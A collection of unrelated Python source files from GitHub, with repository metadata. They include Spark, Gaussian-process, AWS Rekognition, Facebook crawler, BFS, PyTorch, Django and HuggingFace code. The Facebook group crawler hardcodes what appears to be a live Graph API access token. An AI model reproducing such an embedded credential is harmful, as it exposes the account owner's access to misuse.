# dataset -------------> inputRDD --- RDD items are String ---
# |
# | T1: flatMap
# |------------> allWordsRDD --- RDD items are String ---
# |
# | T2: map
# | ---------> pairWordsRDD --- RDD items are (char, int) ---
# |
# | T3: combineByKey
# |-------------------> letterTotalInfoRDD --- RDD items are (char, (int, int))
letterTotalInfoRDD = pairWordsRDD.combineByKey(lambda x: (x, 1),
lambda x, y: (x[0] + y, x[1] + 1),
lambda x, y: (x[0] + y[0], x[1] + y[1])
)
# 5. Operation T4: Transformation 'mapValues', so as to get the average for letter in a new RDD ('solutionRDD').
# We are nearly there. combineByKey has given us pretty much the results we needed. All it is left is to pass from the current accumulator per key
# (letter, (num_letters, num_words)) to a new simple accumulator (letter, num_letters / num_words)
# As we are not going to modify the key of each (key, value) pair, we apply the function mapValues instead of map.
# C1: textFile
# dataset -------------> inputRDD --- RDD items are String ---
# |
# | T1: flatMap
# |------------> allWordsRDD --- RDD items are String ---
# |
# | T2: map
# | ---------> pairWordsRDD --- RDD items are (char, int) ---
# |
# | T3: combineByKey
# |-------------------> letterTotalInfoRDD --- RDD items are (char, (int, int))
# |
# | T4: mapValues
# |----------------> solutionRDD --- RDD items are (char, float) ---
solutionRDD = letterTotalInfoRDD.mapValues(lambda value: (value[0] * 1.0) / (value[1] * 1.0))
# 6. Operation S1: Store the RDD solutionRDD into the desired folder from the DBFS.
# Each node containing part of solutionRDD will produce a file part-XXXXX with such this RDD subcontent, where XXXXX is the name of the node.
# Besides that, if the writing operation is successful, a file with name _SUCCESS will be created as well.
# C1: textFile
# dataset -------------> inputRDD --- RDD items are String ---
# |
# | T1: flatMap
# |------------> allWordsRDD --- RDD items are String ---
# |
# | T2: map
# | ---------> pairWordsRDD --- RDD items are (char, int) ---
# |
# | T3: combineByKey
# |-------------------> letterTotalInfoRDD --- RDD items are (char, (int, int))
# |
# | T4: mapValues
# |----------------> solutionRDD --- RDD items are (char, float) ---
# |
# | S1: saveAsTextFile
# |--------------------> DBFS New Folder
solutionRDD.saveAsTextFile(my_result_dir)
# Extra: To debug the program execution, you might want to this three lines of code.
# Each of them apply the action 'take', taking a few elements of each RDD being computed so as to display them by the screen.
# resVAl = solutionRDD.take(10)
# for item in resVAl:
# print(item)
# ---------------------------------------------------------------
# PYTHON EXECUTION
# This is the main entry point to the execution of our program.
# It provides a call to the 'main function' defined in our
# Python program, making the Python interpreter to trigger
# its execution.
# ---------------------------------------------------------------
if __name__ == '__main__':
# 1. We use as many input arguments as needed
bad_chars = ['?', '!', '.', ',', ';', '_', '-', '\'', '|', '--', '(', ')', '[', ']', '{', '}', ':', '&', '\n']
# 2. Local or Databricks
local_False_databricks_True = False
# 3. We set the path to my_dataset and my_result
my_local_path = "/home/nacho/CIT/Tools/MyCode/Spark/"
my_databricks_path = "/"
my_dataset_dir = "FileStore/tables/1_Spark_Core/my_dataset/"
my_result_dir = "FileStore/tables/1_Spark_Core/my_result"
if local_False_databricks_True == False:
my_dataset_dir = my_local_path + my_dataset_dir
my_result_dir = my_local_path + my_result_dir
else:
my_dataset_dir = my_databricks_path + my_dataset_dir
my_result_dir = my_databricks_path + my_result_dir
# 4. We remove my_result directory
if local_False_databricks_True == False:
if os.path.exists(my_result_dir):
shutil.rmtree(my_result_dir)
else:
dbutils.fs.rm(my_result_dir, True)
# 5. We configure the Spark Context
sc = pyspark.SparkContext.getOrCreate()
sc.setLogLevel('WARN')
print("\n\n\n")
# 6. We call to our main function
my_main(sc, my_dataset_dir, my_result_dir, bad_chars)
| segunar/BIG_data_sample_code | Spark/Workspace/1_Spark_Core/6_Text_File_Examples/24_average_length_of_words.py | 24_average_length_of_words.py | py | 13,654 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.exists",
"line_number": 253,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 253,
"usage_type": "attribute"
},
{
"api_name": "shutil.rmtree",
"line_number": 254,
"usage_type": "call"
},
{
"api_name": "pyspark.SparkContext.get... |
44550764149 | from source.core.visualiser import Visualiser
# Fetch some GP models
from agents.example_agents import agents
# Unobserve the points from some GPs
i = 8
agents[i].unobserve_true_points(x=agents[i].x_seen)
agents[i].kappa = 3 # Higher regard for uncertainty works better for toy problem
# Initialise visualiser class
visualiser = Visualiser()
num = 0
# Plot single static GP with all elements
# visualiser.plot_gps_matplotlib(agents[num:num+2], savefig=True)
# # Plot multiple static GPs with some plot elements removed
# visualiser.plot_gps_matplotlib(agents[8:10], plot_elements=["mean", "observed", "var"])
# Start an interactive example app (make sure to give the input as agents[12:13] even just for 1 agent)
# visualiser.visualise_gps_plotly(agents[9:10], plot_elements=["true", "mean", "var", "observed", "acquisition"])
# Start an interactive ITE app (try i = 8 above)
# visualiser.visualise_ite_plotly(agents[i])
# Start an interactive GPCF app (try inputting agents[9:] and include "var" in plot_elements param)
# visualiser.visualise_gpcf_plotly(agents[9:], plot_elements=["mean", "observed"])
# Start an interactive inHERA app
# visualiser.visualise_inhera_plotly(agents[9:], plot_elements=["mean", "observed"])
# # Plot GPs with different elements to plot
import matplotlib.pyplot as plt
import matplotlib.font_manager as fm
import numpy as np
plt.style.use("seaborn")
fig, ax = plt.subplots()
# visualiser.update_gps_axes_matplotlib(ax=ax,
# gps_arr=agents[18:19],
# plot_elements=["true", "mean", "observed", "acquisition", "prior",])
#
# visualiser.update_gps_axes_matplotlib(ax=ax,
# gps_arr=agents[19:20],
# plot_elements=["mean",],
# alpha=0.6,
# color="seagreen")
#
# visualiser.update_gps_axes_matplotlib(ax=ax,
# gps_arr=agents[20:21],
# plot_elements=["mean",],
# alpha=0.6,
# color="salmon")
# Manually update the inHERA prior mean function:
from core.gaussian_process import GaussianProcess
gp0 = GaussianProcess(true_func=lambda x: np.sin(0.6 * (x - 5)) + 3 - 1.5 / (x + 0.5),
mu_0=lambda x: 0.7 * (np.sin(0.6 * (x - 5)) + 3) + 0.3 * (-1.5 * np.cos(0.6 * (x - 9)) + 1 + 0.1 * x),
x_seen=[1.4])
# 19 Methods/inHERA for report - ANCESTOR 1
gp1 = GaussianProcess(true_func=lambda x: np.sin(0.6 * (x - 5)) + 3,
mu_0=lambda x: np.sin(0.6 * (x - 5)) + 3,
x_seen=[1.5, 7.8])
# 20 Methods/inHERA for report - ANCESTOR 2
gp2 = GaussianProcess(true_func=lambda x: -1.5 * np.cos(0.6 * (x - 9)) + 1 + 0.1 * x,
mu_0=lambda x: -1.5 * np.cos(0.6 * (x - 9)) + 1 + 0.1 * x,
x_seen=[4])
xplot = gp0.x_problem
a1_mu = gp1.mu_new(xplot)
a1_var = gp1.var_new(xplot)
a2_mu = gp2.mu_new(xplot)
a2_var = gp2.var_new(xplot)
a_vars = np.array([a1_var, a2_var]).T
a_mus = np.array([a1_mu, a2_mu]).T
sim_var = np.full(shape=a_mus.shape, fill_value=1.001)
sim_prior = gp0.mu_0(xplot)
W = np.array([0.7, 0.3])
repeated_sim_mu = np.repeat(a=np.expand_dims(a=sim_prior, axis=1), repeats=2, axis=1)
new_prior = sim_prior + (sim_var - a_vars) * (a_mus - repeated_sim_mu) @ W
gp3 = GaussianProcess(true_func=lambda x: np.sin(0.6 * (x - 5)) + 3 - 1.5 / (x + 0.5),
mu_0=lambda x: 0.7 * (np.sin(0.6 * (x - 5)) + 3) + 0.3 * (-1.5 * np.cos(0.6 * (x - 9)) + 1 + 0.1 * x),
x_seen=[1.4])
visualiser.update_gps_axes_matplotlib(ax=ax,
gps_arr=[gp3,])
# family_ancestors_mus =
# print(sim_prior_mean.shape)
# sim_var = np.full(shape=self.family.ancestor_mus.T.shape, fill_value=initial_uncertainty)
# Only change these two lines
font_used = "Charter"
font_size = 21
font = {'fontname': font_used}
legend_font = fm.FontProperties(family=font_used)
legend_font._size = font_size
ax.set_ylim(0, 5)
ax.set_xlim(0, 10)
ax.set_xlabel("Behavioural descriptor", fontsize=font_size, **font)
ax.set_ylabel("Fitness", fontsize=font_size, **font)
ax.tick_params(axis='x', labelsize=15)
ax.tick_params(axis='y', labelsize=15)
# ax.legend(prop=legend_font,)
fig.savefig("my-plot.png", dpi=600)
plt.show()
| mgm21/GPs-visualised | source/main.py | main.py | py | 4,443 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "agents.example_agents.agents",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "agents.example_agents.agents",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "source.core.visualiser.Visualiser",
"line_number": 12,
"usage_type": "call"
},
... |
23949329045 | # -*- coding: utf-8 -*-
"""
Created on Fri Jan 4 15:28:32 2019
@author: abhinav.jhanwar
"""
import boto3
# from s3 bucket
if __name__=="__main__":
filename="farmer-looks-mountain-view.jpg"
bucket="bucket"
client=boto3.client('rekognition')
response = client.detect_labels(Image={'S3Object':
{'Bucket':bucket, 'Name':filename}})
print('Detected labels for ' + filename)
for label in response['Labels']:
print(label['Name'] + ' : '+str(label['Confidence']))
# from local
import boto3
if __name__ == "__main__":
imageFile='Image1.jpg'
client=boto3.client('rekognition')
# image should be base64-encoded string
with open(imageFile, 'rb') as image:
response = client.detect_labels(Image={'Bytes': image.read()})
print('Detected labels in ' + imageFile)
for label in response['Labels']:
print (label['Name'] + ' : ' + str(label['Confidence']))
print('Done...') | AbhinavJhanwar/Amazon-API-boruta | basics/ObjectSceneDetectionImage.py | ObjectSceneDetectionImage.py | py | 973 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "boto3.client",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "boto3.client",
"line_number": 28,
"usage_type": "call"
}
] |
11316416709 | import facebook
import json
import requests
#young creators group
facebook_group_id = '327549154019925'
# A helper function to pretty-print Python objects as JSON
def pp(o):
print(json.dumps(o, indent=2))
# Create a connection to the Graph API with your access token
access_token = 'EAACEdEose0cBABht2FYjCr2DkkBFBHUYNNS84uu34tno0wuUgWXNTmidJO43A8adzb70rIfLhMM8AlLCOnqE3bZAGtXfYM15kZAxK36yrV9Vv43L44BoZCYagLWZB5g0ESDYe6aINtsUX0BR9wZCeSlOIJOfa3ZBJg9Q8CH4pXTAZDZD'
graph = facebook.GraphAPI(access_token, version='2.7')
items = graph.get_connections(facebook_group_id, 'feed')
allItems = []
page_counter = 0
# Wrap this block in a while loop so we can keep paginating requests until
# finished.
while(True):
try:
for item in items:
allItems.append(item.encode('utf-8'))
# Attempt to make a request to the next page of data, if it exists.
items=requests.get(items['paging']['next']).json()
page_counter = page_counter + 1
print(items)
print('\n\n\npages: ' + str(page_counter) +'\n\n\n')
except KeyError:
# When there are no more pages (['paging']['next']), break from the
# loop and end the script.
break | adamhipster/hackathon_website | python_fb_group_crawls/crawl.py | crawl.py | py | 1,134 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.dumps",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "facebook.GraphAPI",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 29,
"usage_type": "call"
}
] |
8666976439 | import argparse, os, string, sys
# Parse all parameters
parser = argparse.ArgumentParser()
parser.add_argument('ctfdir', type=str, help='Directory containing all tasks and descriptions, e.g. example-ctf-2015/')
args = parser.parse_args()
# os.walk returns: dirpath (args.ctfdir), dirnames, filenames
missing=external=completed=''
for root, dirs, files in os.walk(args.ctfdir):
# Get the ctf directory name, challenge type and challenge name in an array
rootarr = root.split('/')
if len(rootarr)!=3: continue
# Reference to the task inside the root CTF directory, e.g. web/task1
taskref = ''
for x in range(1,len(rootarr)-1): taskref += rootarr[x] + "/"
taskref += rootarr[len(rootarr)-1]
for f in files:
if f!='README.md': continue
f=root+'/'+f
ref = '['+taskref+']('+taskref+')'
out = open(f,'r').read()
if '## Write-up\n\n(TODO)\n\n' not in out:
completed+='* '+ref+'\n'
elif '## Other write-ups and resources\n\n* none yet' not in out:
external+='* '+ref+'\n'
else:
missing+='* '+ref+'\n'
readme=''
orig = open(args.ctfdir+'/README.md','r').read()
for line in open(args.ctfdir+'/README.md','r'):
if line=='## Completed write-ups\n': break
readme+=line
readme+='## Completed write-ups\n\n'
if completed=='': completed='* none yet\n'
readme+=completed
readme+='\n## External write-ups only\n\n'
if external=='': external='* none yet\n'
readme+=external
readme+='\n## Missing write-ups'
if missing!='': readme+='\n\n'
if missing[-1:]=='\n': missing=missing[:-1]
if orig[-1:]=='\n': orig=orig[:-1]
readme+=missing
if readme!=orig:
with open(args.ctfdir+'/README.md','w') as rm:
rm.write(readme)
| ctfs/write-ups-tools | checkreadme.py | checkreadme.py | py | 1,638 | python | en | code | 222 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "os.walk",
"line_number": 10,
"usage_type": "call"
}
] |
34212069095 | # https://www.acmicpc.net/problem/1697
# solution dfs
# 1) 현재위치 n에서 가능한 세가지 경우 +1, -1, *2 를 dfs한다
# 2) 이때 dfs의 depth는 탐색 시간을 의미하기에 depth가 현재 최소탐색시간보다 큰 경우는 탐색하지 않는다
# 3) 모든 탐색이 끝난 후 최소탐색시간을 출력한다
# 한계: 파이썬 재귀 depth의 한계(기본적으로 1000) -> ex) 인풋으로 0 100000 이 들어올 경우 10만번 초과 재귀로 런타임 에러
# 좀더 근본적인 한계: 재귀로 탐색하기에는 너무 큰 범위(0 ~ 100000/ +1, -1)
# 조건을 더 줘서 탐색 범위를 줄여보고자 했으나 여전히 시간초과발생
# solution bfs
# 1) 현재위치 n에서 가능한 세가지 경우 +1, -1, *2 를 bfs한다
# 2-1) 이때 방문 여부를 체크하는 배열(visited)에 몇 번째로 방문하는지 count를 입력한다
# 2-2) 즉, q에 visited[next_loc] = visited[loc] + 1 을 저장한다
# 3) k 위치를 탐색 성공하면 최소탐색시간인 visited[k]를 출력한다
# TIL
# dfs는 최단거리를 구하지 않는다. 최단거리를 구하려면 모든 경우를 탐색해야하는데 백트래킹하더라도 시간초과의 위험이 크다
# 더구나 dfs는 재귀를 이용하기에 문제가 많다
# 최단거리 탐색은 bfs를 이용한다
# bfs에서 방문여부 체크하는 동시에 depth 구하는 테크닉
# dfs든 bfs든 방문여부 체크 꼭 하자
import sys
from collections import deque
# def dfs(n,k,depth):
# global min_time, visited
# print(n,depth)
# # 탐색시간 줄이기 위한 코드(임시방편)
# if n>2*k: # n이 너무 커지는 경우 탐색에서 제외
# return
# if depth >20: # 20초과의 depth는 허용않으므로써 재귀 횟수 제한의 문제와 무한루프 문제는 해결
# return
# if depth >= min_time: # 이미 depth가 현재 탐색최소시간 이상이라 더 이상 탐색이 불필요한 경우
# return
# if abs(n-k) == 0: # 탐색성공한경우
# min_time = depth
# return
# if n == 0:
# if visited[n+1] == 0:
# visited[n+1] = 1
# dfs(n+1,k,depth+1)
# visited[n+1] = 0
# else:
# if visited[n*2] == 0:
# visited[n*2] = 1
# dfs(n*2,k,depth+1)
# visited[n*2] = 0
# if visited[n+1] == 0:
# visited[n+1] = 1
# dfs(n+1,k,depth+1)
# visited[n+1] = 0
# if visited[n-1] == 0:
# visited[n-1] = 1
# dfs(n-1,k,depth+1)
# visited[n-1] = 0
def bfs(n,k):
q = deque([])
visited = [0 for _ in range(100001)]
q.append(n)
visited[n] = 1
while len(q) > 0:
loc = q.popleft()
if loc==k:
return visited[k] - 1 # k를 방문(검색성공)할때 탐색 횟수
for n_loc in [loc+1, loc*2, loc-1]:
if (n_loc < 100001) and (n_loc >= 0) and (visited[n_loc] == 0):
q.append(n_loc)
visited[n_loc] = visited[loc] + 1
if __name__ == "__main__":
n,k = tuple(map(int,input().split()))
print(bfs(n,k))
| chankoo/problem-solving | graph/1697-숨바꼭질.py | 1697-숨바꼭질.py | py | 3,234 | python | ko | code | 1 | github-code | 36 | [
{
"api_name": "collections.deque",
"line_number": 67,
"usage_type": "call"
}
] |
40325909166 | from ase.io import *
import numpy as np
import torch
from torch.autograd import Variable
from torch.nn.parameter import Parameter
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.nn.init as init
from sklearn.metrics import mean_squared_error
from math import sqrt
import time
import random
from fingerprint import fingerprint
from sklearn.preprocessing import StandardScaler
import sys
import pickle
#The script belows fits the force components for the H-atoms in dataset.traj. To modify it for fitting O and Pt components, read the comments below.
#Also, please note that the uploaded dataset dataset.traj only contains the first 1000 images of the full data set described in the report. This is due to file size limitations on GitHub.
############## OPTIONS #############
#Data set sizes
N_train = 500 #number of training images
N_valid = 100 #number of test images
Random = False #choose whether to sample random images from the parent data set or use the images from previous run
batch_factor = 50 #optimization will be done with a batch size of N_train/batch_factor
############# Fingerprint options #########
etas = np.linspace(0.2, 4., 20) #Hyperparameter for fingerprint construction
Rc = 0.*np.ones(len(etas)) #Hyperparameter for fingerprint construction
cutoff = 8. #Only consider atoms within cutoff sphere of each atom
preprocess = True #Scale all fingerprint components to have zero mean and unit variance
#Neural network options
num_epochs = 5000 #Number of epochs to perform optimization
epoch_save = 1 #Choose how often results are saved (every epoch_save'th epoch)
num_hidden = 2 #Number of hidden layers in FFNN
num_l1 = 25 #Number of nodes in first hidden layer
num_l2 = 25 #Number of nodes in second hidden layer
lr = 0.01 #Learning rate for optimizer
weight_decay = 0 #Weight decay when using regularization
################ LOAD TEST AND TRAINING IMAGES ####################
#Training images
if Random == True:
indices = random.sample(range(1000), N_train+N_valid) #due to file size limitations dataset.traj contains only the first 1000 images of the original data set.
images = []
for index in indices:
image = read('../dataset.traj', index = index)
images.append(image)
train_images = images[0:N_train]
valid_images = images[N_train:]
write('images.traj', images)
write('train_images.traj', train_images)
write('valid_images.traj', valid_images)
else:
images = read('images.traj', index = ':')
train_images = read('images.traj', index = ':')
valid_images = read('valid_images.traj', index = ':')
############ GET FORCE COMPONENTS #############
#Training images
for count, atoms in enumerate(train_images):
f = atoms.get_forces()[80:144] #In this case we get the forces on the H atoms. For Pt and O this should be changed.
f = f.flatten()
if count == 0:
forces_train = f
else:
forces_train = np.concatenate((forces_train, f), axis = 0)
#Test images
for count, atoms in enumerate(valid_images):
f = atoms.get_forces()[80:144] #In this case we get the forces on the H atoms. For Pt and O this should be changed.
f = f.flatten()
if count == 0:
forces_valid = f
else:
forces_valid = np.concatenate((forces_valid, f), axis = 0)
########### FINGERPRINTS #####################
fingerprints = fingerprint(images, cutoff, etas, Rc, 'H', cutoff_function = False) #fingerprints are calculated with function from fingerprint.py.
if preprocess == True:
ssc = StandardScaler()
fingerprints = ssc.fit_transform(fingerprints)
fingerprints_train = fingerprints[0:N_train*3*64,:] #The number 64 should be changed to 32 or 48 for the case of O or Pt.
fingerprints_valid = fingerprints[N_train*3*64:] #The number 64 should be changed to 32 or 48 for the case of O or Pt.
########### FEED-FORWARD NEURAL NETWORK ################
# define network
class Net(nn.Module):
def __init__(self, num_features, num_l1, num_l2, num_hidden, num_out):
super(Net, self).__init__()
# input layer
self.W_1 = Parameter(init.xavier_normal_(torch.Tensor(num_l1, num_features)))
self.b_1 = Parameter(init.constant_(torch.Tensor(num_l1), 0))
if num_hidden == 1:
# hidden layer 1
self.W_2 = Parameter(init.xavier_normal_(torch.Tensor(num_out, num_l1)))
self.b_2 = Parameter(init.constant_(torch.Tensor(num_out), 0))
if num_hidden == 2:
# hidden layer 1
self.W_2 = Parameter(init.xavier_normal_(torch.Tensor(num_l2, num_l1)))
self.b_2 = Parameter(init.constant_(torch.Tensor(num_l2), 0))
# hidden layer 2
self.W_3 = Parameter(init.xavier_normal_(torch.Tensor(num_out, num_l2)))
self.b_3 = Parameter(init.constant_(torch.Tensor(num_out), 0))
# define activation function in constructor
self.activation = torch.nn.Sigmoid()
def forward(self, x):
x = F.linear(x, self.W_1, self.b_1)
x = self.activation(x)
x = F.linear(x, self.W_2, self.b_2)
if num_hidden == 1:
return x
else:
x = self.activation(x)
x = F.linear(x, self.W_3, self.b_3)
return x
num_input = fingerprints_train.shape[1] #number of inputs is len(etas)*len(species).
num_out = 1 #There is ONE force component to be output for each input vector.
net = Net(num_input, num_l1, num_l2, num_hidden, num_out)
#Set up optimizer and loss function
optimizer = optim.Adam(net.parameters(), lr = lr, weight_decay = weight_decay)
criterion = nn.MSELoss()
################## TRAINING ###########################
# hyperparameters
batch_size_train = int(len(train_images)*64*3/batch_factor) #The number 64 should be changed to 32 or 48 for the case of O or Pt.
num_samples_train = fingerprints_train.shape[0]
num_batches_train = num_samples_train // batch_size_train
batch_size_valid = int(len(valid_images)*64*3/batch_factor) #The number 64 should be changed to 32 or 48 for the case of O or Pt.
num_samples_valid = fingerprints_valid.shape[0]
num_batches_valid = num_samples_valid // batch_size_valid
# setting up lists for handling loss/accuracy
train_acc, train_loss, train_resid = [], [], []
valid_acc, valid_loss, valid_resid = [], [], []
epochs = []
cur_loss = 0
losses = []
get_slice = lambda i, size: range(i * size, (i + 1) * size)
for epoch in range(num_epochs):
cur_loss = 0
net.train()
for i in range(num_batches_train):
slce = get_slice(i, batch_size_train)
fingerprint_batch = Variable(torch.from_numpy(fingerprints_train[slce]).float())
output = net(fingerprint_batch)[:,0]
# compute gradients given loss
forces_batch = Variable(torch.from_numpy(forces_train[slce]).float())
batch_loss = criterion(output, forces_batch)
optimizer.zero_grad()
batch_loss.backward()
optimizer.step()
cur_loss += batch_loss
losses.append(cur_loss)
net.eval()
### Evaluate training
train_preds, train_targs = [], []
for i in range(num_batches_train):
slce = get_slice(i, batch_size_train)
fingerprint_batch = Variable(torch.from_numpy(fingerprints_train[slce]).float())
forces_batch = Variable(torch.from_numpy(forces_train[slce]).float())
output = net(fingerprint_batch)
preds = output[:,0]
train_targs += list(forces_train[slce])
train_preds += list(preds.data.numpy())
### Evaluate validation
val_preds, val_targs = [], []
for i in range(num_batches_valid):
slce = get_slice(i, batch_size_valid)
fingerprint_batch = Variable(torch.from_numpy(fingerprints_valid[slce]).float())
output = net(fingerprint_batch)
preds = output[:,0]
val_preds += list(preds.data.numpy())
val_targs += list(forces_valid[slce])
train_acc_cur = sqrt(mean_squared_error(train_targs, train_preds))
valid_acc_cur = sqrt(mean_squared_error(val_targs, val_preds))
train_resid_cur = (np.array(train_targs) - np.array(train_preds)).max()
valid_resid_cur = (np.array(val_targs) - np.array(val_preds)).max()
if epoch/epoch_save == epoch//epoch_save:
print("Epoch %2i : Train Loss %f , Train acc %f, Valid acc %f" % (epoch+1, losses[-1], train_acc_cur, valid_acc_cur))
epochs.append(epoch)
train_acc.append(train_acc_cur)
valid_acc.append(valid_acc_cur)
train_resid.append(train_resid_cur)
valid_resid.append(valid_resid_cur)
train_summary = {}
train_summary['epochs'] = epochs
train_summary['train_acc'] = train_acc
train_summary['train_resid'] = train_resid
train_summary['valid_acc'] = valid_acc
train_summary['valid_resid'] = valid_resid
train_summary['val_targs'] = val_targs
train_summary['val_preds'] = val_preds
train_summary['train_targs'] = train_targs
train_summary['train_preds'] = train_preds
with open('train_summary.pickle', 'wb') as f:
pickle.dump(train_summary, f)
| Augustegm/Water-Pt | Water-Pt(111)/NeuralNet.py | NeuralNet.py | py | 9,197 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.linspace",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.ones",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "random.sample",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line... |
3962464959 | import datetime
from django import forms
from django.core.exceptions import ValidationError
from .models import Appointment
from django.contrib.auth.models import User
class DateInput(forms.DateInput):
"""
This class gets the widget working to show a datepicker
"""
input_type = 'date'
class TimeInput(forms.TimeInput):
"""
This class gets the widget working to show a datepicker
"""
input_type = 'text'
class AppointmentForm(forms.ModelForm):
"""
Form for creating and updating an appointment.
Attributes:
- user_id (int): The ID of the user associated with the appointment.
Methods:
- __init__(user_id, *args, **kwargs): Initializes the form instance.
- clean(): Performs form validation and cleans the form data.
"""
def __init__(self, user_id, *args, **kwargs):
"""
Initializes the form instance.
"""
self.user_id = user_id
super(AppointmentForm, self).__init__(*args, **kwargs)
def clean(self):
"""
Performs form validation and cleans the form data.
Checks for conflicts with existing appointments and validates the date.
Raises:
- forms.ValidationError: If there is a conflict with an existing appointment or date is in the past. # noqa
"""
super().clean()
self.instance.user_id = self.user_id
date = self.cleaned_data.get("date")
time = self.cleaned_data.get("time")
nutritionist = self.cleaned_data.get('nutritionist')
conflicts = Appointment.objects.filter(date=date).filter(time=time).filter(nutritionist=nutritionist).exclude(pk=self.instance.pk) # noqa
if conflicts.exists():
raise forms.ValidationError("This appointment conflicts with an existing appointment.") # noqa
if date < datetime.date.today():
raise forms.ValidationError("The date cannot be in the past!")
class Meta:
model = Appointment
fields = [
'date',
'time',
'reason',
'nutritionist',
]
widgets = {
'date': DateInput(attrs={
'min': datetime.date.today() + datetime.timedelta(days=0),
'max': datetime.date.today() + datetime.timedelta(days=30)
}),
'time': TimeInput(attrs={
'class': 'timepicker'
}),
'nutritionist': forms.Select(attrs={'class': 'form-select'}),
}
| Giov3ss/iHealthy | appointments/forms.py | forms.py | py | 2,524 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.forms.DateInput",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "django.forms",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "django.forms.TimeInput",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "dj... |
22353413985 | from typing import Any, Dict, List
import numpy as np
import transformers
import mlrun
from mlrun.serving.v2_serving import V2ModelServer
class HuggingFaceModelServer(V2ModelServer):
"""
Hugging Face Model serving class, inheriting the V2ModelServer class for being initialized automatically by the
model server and be able to run locally as part of a nuclio serverless function, or as part of a real-time pipeline.
Notice:
In order to use this serving class, please ensure that the transformers package is installed.
"""
def __init__(
self,
context: mlrun.MLClientCtx = None,
name: str = None,
task: str = None,
model_path: str = None,
model_name: str = None,
model_class: str = None,
tokenizer_name: str = None,
tokenizer_class: str = None,
framework: str = None,
**class_args,
):
"""
Initialize a serving class for a Hugging face model.
:param context: For internal use (passed in init).
:param name: The name of this server to be initialized
:param task: The task defining which pipeline will be returned.
:param model_path: Not in use. When adding a model pass any string value
:param model_name: The model's name in the Hugging Face hub
e.g., `nlptown/bert-base-multilingual-uncased-sentiment`
:param model_class: The model class type object which can be passed as the class's name (string).
Must be provided and to be matched with `model_name`.
e.g., `AutoModelForSequenceClassification`
:param tokenizer_name: The name of the tokenizer in the Hugging Face hub
e.g., `nlptown/bert-base-multilingual-uncased-sentiment`
:param tokenizer_class: The model's class type object which can be passed as the class's name (string).
Must be provided and to be matched with `model_name`.
e.g., `AutoTokenizer`
:param framework: The framework to use, either `"pt"` for PyTorch or `"tf"` for TensorFlow. The specified
framework must be installed.
If no framework is specified, will default to the one currently installed.
If no framework is specified and both frameworks are installed, will default to the
framework of the `model`, or to PyTorch if no model is provided
:param class_args: -
"""
super(HuggingFaceModelServer, self).__init__(
context=context,
name=name,
model_path=model_path,
**class_args,
)
self.task = task
self.model = None
self.tokenizer = None
self.model_name = model_name
self.tokenizer_name = tokenizer_name
self.model_class = model_class
self.tokenizer_class = tokenizer_class
self.framework = framework
self.pipe = None
def load(self):
"""
loads the model and the tokenizer and initializes the pipeline based on them.
"""
# Loading the pretrained model:
if self.model_class:
model_object = getattr(transformers, self.model_class)
self.model = model_object.from_pretrained(self.model_name)
# Loading the pretrained tokenizer:
if self.tokenizer_class:
tokenizer_object = getattr(transformers, self.tokenizer_class)
self.tokenizer = tokenizer_object.from_pretrained(self.tokenizer_name)
# Initializing the pipeline:
self.pipe = transformers.pipeline(
task=self.task,
model=self.model or self.model_name,
tokenizer=self.tokenizer,
framework=self.framework,
)
def predict(self, request: Dict[str, Any]) -> List:
"""
Generate model predictions from sample.
:param request: The request to the model. The input to the model will be read from the "inputs" key.
:return: The model's prediction on the given input.
"""
# Get the inputs:
inputs = request["inputs"]
# Applying prediction according the inputs shape:
result = (
[self.pipe(**_input) for _input in inputs]
if isinstance(inputs[0], dict)
else self.pipe(inputs)
)
# Arranging the result into a List[Dict]
# (This is necessary because the result may vary from one model to another)
if all(isinstance(res, list) for res in result):
result = [res[0] for res in result]
# Converting JSON non-serializable numpy objects to native types:
for res in result:
for key, val in res.items():
if isinstance(val, np.generic):
res[key] = val.item()
elif isinstance(val, np.ndarray):
res[key] = val.tolist()
return result
def explain(self, request: Dict) -> str:
"""
Return a string explaining what model is being served in this serving function and the function name.
:param request: A given request.
:return: Explanation string.
"""
return f"The '{self.model_name}' model serving function named '{self.name}"
| mlrun/mlrun | mlrun/frameworks/huggingface/model_server.py | model_server.py | py | 5,513 | python | en | code | 1,129 | github-code | 36 | [
{
"api_name": "mlrun.serving.v2_serving.V2ModelServer",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "mlrun.MLClientCtx",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "transformers.pipeline",
"line_number": 86,
"usage_type": "call"
},
{
... |
73985065704 | from datetime import datetime, timedelta
from typing import Union
from uuid import uuid4
from django.apps import AppConfig
from django.conf import settings
class DjangoLightAuthConfig(AppConfig):
name = "django_light_auth"
default = True
login_path = "/login"
logout_path = "/logout"
success_path = "/"
validate_func = "django_light_auth.light_auth_validate_func"
allow_paths = set()
token = uuid4().hex
# https://docs.djangoproject.com/en/3.1/topics/http/sessions/
expiry: Union[None, int, datetime, timedelta] = 3600 # 1 hour
def ready(self):
# func
value = getattr(settings, "LIGHT_AUTH_VALIDATE_FUNC", "")
if value:
self.validate_func = value
# path
value = getattr(settings, "LIGHT_AUTH_LOGIN_PATH", "")
if value:
self.login_path = value.rstrip("/")
value = getattr(settings, "LIGHT_AUTH_LOGOUT_PATH", "")
if value:
self.logout_path = value.rstrip("/")
self.allow_paths.add(self.login_path)
self.allow_paths.add(self.logout_path)
# expiry
value = getattr(settings, "LIGHT_AUTH_EXPIRY", None)
if value is None:
